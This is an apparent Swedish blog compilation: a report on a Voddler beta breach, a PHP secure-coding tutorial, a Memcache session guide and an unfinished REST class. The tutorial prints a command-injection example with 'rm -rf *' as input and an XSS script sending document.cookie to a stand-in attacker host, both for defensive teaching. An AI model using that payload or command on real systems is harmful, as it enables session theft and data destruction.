Detta uppmärksammades först på Webmaster Networks (WN) IRC-kanal, och sen publicerades det ett inlägg under Nyheter på WN.

Eftersom IDG brukar vara relativt snabba på att skvallra när det hänt något så skickade jag ett mail till Daniel Goldberg på Computer Sweden (eftersom han skrev om Voddlers premiär) och hänvisade till tråden på WN, kort därefter så dök artikeln upp på Tech World, med hänvisning till WN.

Mina kommentarer är kort att det är förargligt men även att förskräckligt.

Hur gjorde dom då?

Enligt inlägget från fransmännen (forumet är nedstängt, men en kopia finns här: Sida 1, Sida 2) som lade ut det hela, så verkar han ha kommit åt en fil med PHP-kod, där uppgifter till MySQL fanns med (root uppgifter med synligt lösenord) och testade att logga in med detta till maskinen.

Enligt Mattias Hjelmstedt, vice vd och en av grundarna bakom Voddler, så skulle detta enbart röra sig om intrång i beta-programmet.

– I det läget hade vi 176 aktiva konton och intrånget har skett i betaversionen och inte i den skarpa tjänst som lanseras snart. Vi har nu skärpt säkerheten och sett till att liknande intrång inte ska kunna ske igen, säger Hjelmstedt.

Men det han glömmer att berätta är att det finns 15’000st epost adresser på vift med tillhörande lösenord. Samt att beta & den framtida webbplatsen finns på samma maskin. Dit hackarna har haft tillgång.

Uppdaterat: Nu har även Svenska Dagbladet kommit ut med det

Jag skall gå igenom dom vanligaste missarna som kan resultera i säkerhetshål och visa exempel på hur man kan göra för att undvika detta. Jag hoppas att du som läsare skall förstå hur man kan undvika detta. Genom att förstå varje miss hjälper dig att undvika misstagen i dina script.

Säkerhet är en process, inte en produkt, och genom att ha en tänka på säkerheten när man programmerar sin applikation så kommer du att producera en tätare och mer robust kod.

Ej kontrollerade inmatningar

Ett av dom (om inte det) vanligaste säkerhetshålet i PHP är icke kontrollerad data. När en användare som kan fylla i formulär kan helt enkelt inte bli litad på. Du skall alltid anta att varje användare som kommer att använda din applikation är illvillig, för att det är alltid någon som kommer att bli det. Ej kontrollerad eller ej korrekt kontrollerad är grunden till att många brister förekommer. Men vi kommer till det senare.

Som ett exempel, du kommer att skriva följande kod för att tillåta en användare att visa en kalender som visar en specifik månad genom att anropa UNIX kommandot ”cal”.

$month = $_GET['month'];
$year = $_GET['year'];

exec("cal $month $year", $result);
print "<PRE>";
foreach ($result as $r) { print "$r<BR>"; }
print "</PRE>";

Denna koden har ett stort säkerhetshål, detta genom att den $_GET['month'] och $_GET['year'] blir inte validerade på något sätt. Applikationen gör exakt vad den skall göra, så länge month är ett värde mellan 1 och 12, och year är ett korrekt 4-siffrigt årtal. Men, en elak användare kanske skriver ”ls -l” istället för ett årtal och kan därmed se en listning av hela din webbsidas html katalog. En extremt elak användare kan skriva ”rm -rf *” istället och därmed radera hela din websida!

Den korrekta vägen att göra detta är att kontrollera att year och month verkligen är vad du vill att det skall vara. Använd inte JavaScript för denna kontroll; denna form av validering kommer man enkelt runt genom att skapa ett eget formulär eller genom att stänga av javascript. Javascript validering här är bra på ett sätt, att kontrollera formuläret och underrätta användaren om att inmatningen är felaktig. För att göra detta korrekt behöver du lägga till PHP kod som försäkrar dig om att month och year är siffror och enbart siffror, som jag visar nedan.

$month = $_GET['month'];
$year = $_GET['year'];
if (!preg_match("/^[0-9]{1,2}$/", $month)) die("Felaktig månad");
if (!preg_match("/^[0-9]{4}$/", $year)) die("Felaktigt årtal");

exec("cal $month $year", $result);
print "<PRE>";
foreach ($result as $r) { print "$r<BR>"; }
print "</PRE>";

Denna kod kan användas utan att oroa sig för att en användare skall utnyttja något säkerhetshål. Eftersom den tillåter bara siffror. Reguljära uttryck är ett fantastiskt verktyg att använda för att validera inmatningar. De kan vara svåra att få ett grepp om, men när man lärt sig det så är det otroligt kraftfullt att använda. Speciellt i sådana här fall.

Du skall alltid när du validerar användardata neka allting som inte stämmer överrens med det du vill ha. Gå aldrig den vägen att du godkänner allting utom det du vet är skadligt, detta är en känd källa av säkerhetshål. Ibland kommer skadliga användare runt detta genom att till exempel, genom att inkludera skadlig data genom att förvränga det med null tecken. Detta skulle godkännas i din kontroll, men skulle ha en skadlig effekt.

Du skall vara så restriktiv du bara kan när du validerar data. Om några tecken inte behöver inkluderas, så skall du kapa bort dom eller neka det helt och hållet.

Åtkomstkontroll

En annan typ av säkerhetshål, som inte enbart är för PHP, utan är viktig hur som helst, är åtkomstkontroller. Denna brist kan bokstavligen röra om det i skallen på en, speciellt om du har vissa sektioner där din applikation måste vara begränsad till vissa användare, så som att administrations sidan tillåts att göra vissa ändringar, eller visa känslig information.

Du skall kontrollera användarens rättigheter vid varje laddning av sidan i din PHP applikation. Om du enbart kontrollerar användarens uppgifter vid index sidan, en elak användare kan skriva in URLen till en ”djupare” sida, vilket skulle innebära att han kommer förbi denna kontroll.

Den är också bra att man lägger till ett lager av säkerhet till, till exempel, genom att enbart tillåta användarens tillgång genom dennes IP och användarnamn, om du har turen att användarna har ett förutsägbart eller statiskt tilldelat IP. Genom att placera dina filer i en katalog som är skyddad av Apaches .htaccess är också en bra början.

Man skall också placera konfigurations filer utanför html katalogen. Konfigurationsfilerna innehåller oftast uppgifter för databas anslutning och annan information som kan användas av en elak användare för att penetrera eller vanställa din sida, tillåt aldrig att dessa filer att bli visade för någon användare. Använd PHPs include funktion för att inkludera filer från en katalog som man inte kommer åt från webben, tex en katalog ”_includes”, där det finns en .htaccess som innehåller deny from all. Detta är redundant, så alla kataloger i denna katalog skyddas också.

För mina PHP applikationer, så föredrar jag en katalog struktur som visas nedan. Alla funktioner, classer & konfigurations filer är lagrade i _includes. Spara alltid filer som skall inkluderas med .php filändelsen, så även om skyddet faller så kommer webbservern att interpretera PHP koden, och inte visa något för användaren. www & admin är kataloger som bara kan nås via en URL, admin katalogen skyddas även av en .htaccess, och tillåter tillträde enbart om användarnamn och lösenord finns sparade i .htpasswd i roten.

/home
  /httpd
    /www.example.com
    .htpasswd
    /includes
      cart.class.php
      config.php
    /logs
      access_log
      error_log
    /www
      index.php
      /admin
        .htaccess
        index.php

Du skall ställa in så att Apache indexerar index.php och visar den som standard, detta är oftast redan gjort om man har PHP installerat.

Gör aldrig, aldrig en backup av en PHP fil genom att genom att lägga till/byta ut filändelsen mot .bak eller någon annan filändelse. Beroende på din webbserver du använder (Apache har tacksamt skydd mot detta), så kommer PHP koden i filen inte att interpreteras, och det kan hända att den skriver ut koden i klartext, om denna fil skulle innehålla lösenord eller annan känslig information så skulle detta visas för användaren, det kan till och med synas i sökresultaten hos en sökmotor. Döp istället om filen till .bak.php istället. Den bästa lösningen är använda ett revisions system som tex. CVS eller SVN, båda kan vara komplicerade att lära sig, men tiden du spenderar på det kommer att betala sig väl på många sätt. Systemet sparar vartenda version av varje fil i ditt projekt, vilket kan vara ovärdeligt när en ändring skapar problem senare.

Session ID Skydd

Session ID kapning kan vara ett problem med PHP webbsidor. PHP spårning komponent använder ett unikt ID för varje användares session, men om detta ID blir känt för en annan användare, så kan den personen kapa sessionen och därmed se informationen som skall vara skyddad för denne. Session ID kapning kan inte bli helt säker, men om du känner till riskerna så kan du förebygga det väl.

Exempelvis, även efter att en användare har blivit validerad och tilldelat en sessions ID, så skall du alltid validera denne varje gång den gör något känsligt, så som att denne byter användarnamn, lösenord mm. Tillåt aldrig en sessions validerad användare att ändra lösenord utan att låta dom fylla i det gamla lösenordet också. Du skall också försöka låta bli att visa särskilt känslig information, som tex. kreditkortsnummer, till en användare som bara är validerad genom en session.

En användare som skapar en ny session genom att logga skall alltid få ett nytt sessions ID genom att använda session_regenerate_id funktionen. En kapad användare kommer att försöka använda det gamla sessions ID innan man loggade in.

Om din webbsida hanterar kritisk information som tex kreditkortsnummer, använd alltid SSL anslutning. Detta kommer att hjälpa till att förebygga risken för kapning, eftersom man inte kan sniffa trafiken.

Om din webbsida körs på en delat Webserver, var uppmärksam på att vilken sessions variablar som helst kan bli visade för vilken annan användare på samma server. För att mildra detta så kan man spara all känslig information i databasen, istället för i sessionen. Om du måste spara ett lösenord i en session (och jag påpekar att detta bör man inte göra!) så spara det inte i klartext, använd istället sha1() (PHP 4.3+) eller md5() för att spara en hash av lösenordet istället.

if ($_SESSION['password'] == $userpass) {
// gör känsliga saker här
}

Koden ovanför är inte säker, eftersom lösenordet är sparat i ren text i variabeln. Istället använd kod mer som denna.

if ($_SESSION['sha1password'] == sha1($userpass)) {
// gör känsliga saker här
}

Cross Site Scripting (XSS) Brister

Cross site scripting, eller XSS, brister är ett samlingsnamn där en användare har fått möjligheten att bädda in script kommandon, vanligen JavaScript, i data som blir visade och därmed körs dom av en annan användare.

Till exempel, din applikation har ett forum där personer kan posta inlägg som läses av andra användare, en elak användare kan bädda in en <script> tagg, som visas nedan, vilket skulle innebära att sidan laddas om till en annan sida som är kontrollerad av dom, och skickar med cookie informationen och sessions information som $GET variablar till deras sida, och skickar sedan tillbaka dig som om ingenting har hänt. En elak användare kan därmed hämta alla andra användares cookies och session information, och använda denna inforamtion för en sessions kapning (se ovan) eller en annan attack mot sidan.

<script>
document.location =
	'http://www.badguys.com/cgi-bin/cookie.php?' +
	document.cookie;
</script>

För att motverka denna formen av attack så måste du vara försiktig när du visar information som användare har publicerat. Den enklaste vägen att skydda sig mot detta är att escape:a alla tecken som används i HTML syntax (särskilt &lt; och &gt;) för att bli HTML kodade (&amp;lt; och &amp;gt;), så att den inskickade datan helt enkelt publiceras som ren text. Använd PHPs htmlspecialchars funktionen för detta bruk.
Om din applikation kräver att användarna skall kunna skicka HTML innehåll och det skall behandlas så, så bör du istället filtrera bort potientiella skadliga taggar såsom <script>. Detta är bäst gjort när innehållet först är inskickat, och kommer att kräva lite reguljära uttryck.

Cross Site Scripting FAQ på cgisecurity.com ger mycket mer information och bakgrund till denna typ av brist och förklarar det mycket väl. Det är en läsning jag verkligen rekommenderar och hoppas ni förstår den. XSS brister kan vara svårt att se och det kan hända den bäste när man bygger en applikation.

Skall visa ett sätt att göra detta i PHP och tillsammans med memcached

Sessions delning i Webbkluster

Om du har flera webbserver som alla har hand om samma webbsida, sessioner borde bli delade mellan dessa servers, och inte sparas på varje servers disk. För när en användare blir lastbalanserad till en annan server, så kan inte sessionen hittas, vilket kommer att resultera i att användaren blir utloggad.

En vanlig väg runt detta är att använda en anpassad sessions hanterare. Skriver en klass som tar över standard förfarandet och sparas sessionen i en MySQL databas

Sessioner i en databas

Alla webservrar ansluter till samma databas och såvidare, så snart www01 registrerar en session ( insert i en sessions tabel), www02 kan läsa den. Alla servrarna kan se alla sessioner. Problem löst?

Ja, och nej. Detta är funktionellt och det hanterar problemet med delbarheten. Men databaser är den största flaskhalsen för webbkluster idag. De är svåra att skala, och i miljöer där det förekommer hög trafik så vill man inte belasta dom i onödan. Sessioner i en databas löser bara 2/3 av problemet, vi måste lösa prestandan också.

Databas minne

Minne är cirka 30 gånger snabbare än disk utrymme. Så att spara våra sessioner i minnet skulle ge oss bra prestanda.

MySQL query caching

En form av att använda databas minne är det som är inbyggt i MySQL. MySQL query cache. Men MySQL query cache är inte så effektivt som man skulle vilja, kort och gott, det suger! När man skriver/uppdaterar en post i MySQL så töms cachen. Inte så effektivt som man skulle vilja.

Självklart så blir sessions tabellen ändrad hela tiden, vilket gör att cachen blir tömd hela tiden, vilket gör den värdelös får detta bruk.

Heap tables / Memory tables

Vi närmar oss verkligen vårt mål nu. Spara våra sessioner i en heap/memory table (en tabell som existerar i databas serverns RAM) snabbar verkligen upp saker ordentligt. Många krävande sidor har valt denna lösning.

Men i mina ögon, så är detta inte optimalt. För att detta kräver en massa extra frågor mot våran databas, något som den inte skall behöva.

En annan lösning är att använda Memcache. Och du kommer att finna denna lösning enkel och minimal. På grund av en sak, du behöver inte en anpassad lösning. Stödet för detta följer med PHP.

Memcache

Memcache är ett litet program som ursprungligen kommer från Live Journal. Det är ganska enkelt: Det reserverar lite minne, öppnar upp en socket och bara finns där.

Vi kan ansluta till socketen och spara variablar där, och hämta dom senare. Lagringen av variablarna sker i minnet. Så det är blixtsnabbt.

Memcache kan användas för en mängd saker, funktions resultat, hela html block, databas resultat. Men vi skall använda det för att spara vår användares sessioner.

Uppbyggnad

Från systemets sida, Memcache liknar mycket som MySQL. Du har en:

• Server
  Där informationen är lagrad. Bör köras hela tiden
• Klient
  Interface för att spara & hämta information från servern.
  Är integrerat i vårt programmerings språk

Det är en viktig sak som skiljer. Om Memcache stängs av, så förloras all information. Så kom ihåg att bara använda Memcache som en cache och ingen lagringsenhet. Det finns ingen möjlighet att återskapa data, likt en hårddisk. För sessioner så är detta en risk jag är beredd att ta. Det värsta som kan hända är att användarna loggas ut. Om du inte kan leva med detta så bör du kombinera databas & memcache sessions hanterare. Databas är en säker lösning, memcache kommer att vara front för dess prestanda. Om den kraschar, så kommer du bara att förlora prestandan, men inte datan.

Installera en Memcache server

För sessions delning, använd en central server. Om du bara har en webbserver, så gör det fortfarande nytta att använda Memcache för dess prestanda. Ändra bara så att dess maximala minnes storlek är begränsat till 64MB (beror på din server och önskemål), och använd localhost (127.0.0.1) för att ansluta till den.

Om du inte har Memcache redan, så kan du enkelt installera det via ditt paketsystem. Jag använder Debian så för mig är det:

apt-get install memcached

Ändra inställningarna i /etc/memcached/memcached.conf. I mitt fall så var grundinställningen OK. Jag ökade bara det maximala värdet för minnet och tillät fler att ansluta.

Starta nu om Memcache processen

/etc/init.d/memcached restart

(För mig startades processen automatiskt när jag installerade den. Därför jag har restart istället för start. Men skulle inte processen vara igång så fungerar restart lika bra.)

Nu är vi klara att använda Memcache. Men hur?

Installera en Memcache klient

Du kunde bara öppna upp en socket via telnet och ”prata” direkt med Memcache, men det skulle troligen mest ge dig huvudvärk. Så det finns en standard PHP modul som vi kan använda och som gör majoriteten av jobbet åt oss, och som tillåter oss att prata objekt orienterat med den. Detta fungerar nästan precis som att installera en MySQL modul. Om din distribution har den, så bra då, kör bara:

apt-get install php5-memcache

Om inte, inga problem. Se bara till att du har pecl tillgängligt och:

pear install pecl/memcache

(Pecl har en bug som ger ett ”Fatal error: Allowed memory size of XXXX bytes exhausted)

När du använder pecl som metod, var god välj:

Enable memcache session handler support? [yes] : yes

Du måste aktivera så att PHP kan använda modulen vi nu har, så lägg till:

extension=memcache.so

I Debian så finns det en katalog i /etc/php5/ som heter conf.d, där ligger troligen alla dina moduler. Finns det inte en fil som heter något i stil med memcache.ini så skapa en med innehållet ovan.

Toppen, nu har vi alla förutsättningar för att börja använda Memcache.

Sessioner i Memcache

PHP tillåter dig att styra över hanteringen för sessioner på två sätt:

1. session_set_save_handler(). För att programmera dina egna sessions hanterare, tillåter dig virtuellt sätt att använda vilket lagringssätt du vill, så länge du kan läsa/skriva till det från PHP. Detta exempel använder en MySQL databas. Vi kan också använda denna metod för att ansluta till Memcache.
2. session.save_handler. Genom att specificera en av standard hanterarna i php.ini genom att använda session.save_handler & session.save_path

Val 1 ger dig större flexibilitet. Och ger dig även möjligheten att skapa en kombinerad lösning databas/memcache. Vilket resulterar i en fallback till databasen om något skulle hända med Memcache.

Val 2 är väldigt enkelt att göra, och kräver inte att man måste ändra sin kod, och det är det jag skall visa.

session.save_handler

Förutsätter att du redan har en webbserver, och installerat Memcache på samma maskin, hostnamnet kommer att vara 127.0.0.1. Om du har den på en annan server så vet du vad du skall ändra och vad det skall ändras till.

session.save_handler = memcache
session.save_path = "tcp://127.0.0.1:11211"

Klart! HUH? Vad hände precis?

Japp, vi har precis aktiverat Memcache sessions hantering stöd, och allt jobb är klart för oss. PHP kommer nu att veta att den inte skall använda standard files hanteringen i /tmp/ eller vart det nu är inställt att sparas, utan kommer att använda Memcache som körs på 127.0.0.1 istället.

Glöm inte bort att starta om din webserver för att verkställa dina ändringar i php.ini

/etc/init.d/apache2 restart

Haken

Precis som med allting som verkar för coolt, så är det en hake: Låsning. PHPs standard metod för sessions hantering låser hela sessionen tills den är klar. Memcache är byggt för hastighet och som ett resultat av detta så stödjer det inte denna form av låsning. Detta kan leda till att när man använder frames eller AJAX. Ibland kan det ske att man frågar efter ett värde precis innan det har sparats.

Mer läsning kring detta

Det vi precis har gjort med Memcache är lätt fångad frukt. Vi har aktiverat RAM sessioner med minsta möjliga ansträngning utan att ha ändrat en rad av våran existerande kod.

Men nu när du har Memcache igång, så kanske du vill använda det för att spara övrig ofta-använda/sällan-ändrade variables också. Var så god och känn dig för och kolla dokumentationen. Du kommer att lära dig att Memcache kan utöka din serversidas prestanda rejält.

Mina medarbetare har nu efterfrågat möjligheten för tredjepart att utveckla mot denna plattform.

Så jag har satt mig ned och undersökt denna möjlighet, eftersom Facebook, Twitter mfl använder REST, så varför inte.

Med möjligheten för REST så kan man även använda HTTP Svarskoder istället för att lägga ned tid på att göra ett eget, som säkerligen lär kräva en manual för att tolka.

Tex:

När man skapat ett inlägg, användare eller annat, svara enkelt med 201 (201 = Created), när något har gått fel så svarar man med 500 (500 = Internal Server Error), eller om dom brutit mot API:et ett 400 fel (400 = Bad Request). Man kan även skicka ett 501 fel om dom försöker skicka POST till något som bara kräver GET (501 = Not Implemented). Om MySQL servern är nere så ett 503 (503 = Service unavailable). Ja, du fattar mitt tänk här. Du kan läsa mer om status koderna på Wikipedia HTTP Status Koder.

class RestUtils
{
	public static function processRequest()
	{

	}

	public static function sendResponse($status = 200, $body = '', $content_type = 'text/html')
	{

	}

	public static function getStatusCodeMessage($status)
	{
		// these could be stored in a .ini file and loaded
		// via parse_ini_file()... however, this will suffice
		// for an example
		$codes = Array(
		    100 => 'Continue',
		    101 => 'Switching Protocols',
		    200 => 'OK',
		    201 => 'Created',
		    202 => 'Accepted',
		    203 => 'Non-Authoritative Information',
		    204 => 'No Content',
		    205 => 'Reset Content',
		    206 => 'Partial Content',
		    300 => 'Multiple Choices',
		    301 => 'Moved Permanently',
		    302 => 'Found',
		    303 => 'See Other',
		    304 => 'Not Modified',
		    305 => 'Use Proxy',
		    306 => '(Unused)',
		    307 => 'Temporary Redirect',
		    400 => 'Bad Request',
		    401 => 'Unauthorized',
		    402 => 'Payment Required',
		    403 => 'Forbidden',
		    404 => 'Not Found',
		    405 => 'Method Not Allowed',
		    406 => 'Not Acceptable',
		    407 => 'Proxy Authentication Required',
		    408 => 'Request Timeout',
		    409 => 'Conflict',
		    410 => 'Gone',
		    411 => 'Length Required',
		    412 => 'Precondition Failed',
		    413 => 'Request Entity Too Large',
		    414 => 'Request-URI Too Long',
		    415 => 'Unsupported Media Type',
		    416 => 'Requested Range Not Satisfiable',
		    417 => 'Expectation Failed',
		    500 => 'Internal Server Error',
		    501 => 'Not Implemented',
		    502 => 'Bad Gateway',
		    503 => 'Service Unavailable',
		    504 => 'Gateway Timeout',
		    505 => 'HTTP Version Not Supported'
		);

		return (isset($codes[$status])) ? $codes[$status] : '';
	}
}

class RestRequest
{
	private $request_vars;
	private $data;
	private $http_accept;
	private $method;

	public function __construct()
	{
		$this->request_vars		= array();
		$this->data				= '';
		$this->http_accept		= (strpos($_SERVER['HTTP_ACCEPT'], 'json')) ? 'json' : 'xml';
		$this->method			= 'get';
	}

	public function setData($data)
	{
		$this->data = $data;
	}

	public function setMethod($method)
	{
		$this->method = $method;
	}

	public function setRequestVars($request_vars)
	{
		$this->request_vars = $request_vars;
	}

	public function getData()
	{
		return $this->data;
	}

	public function getMethod()
	{
		return $this->method;
	}

	public function getHttpAccept()
	{
		return $this->http_accept;
	}

	public function getRequestVars()
	{
		return $this->request_vars;
	}
}

Det är inte mycket ännu, men mer kommer.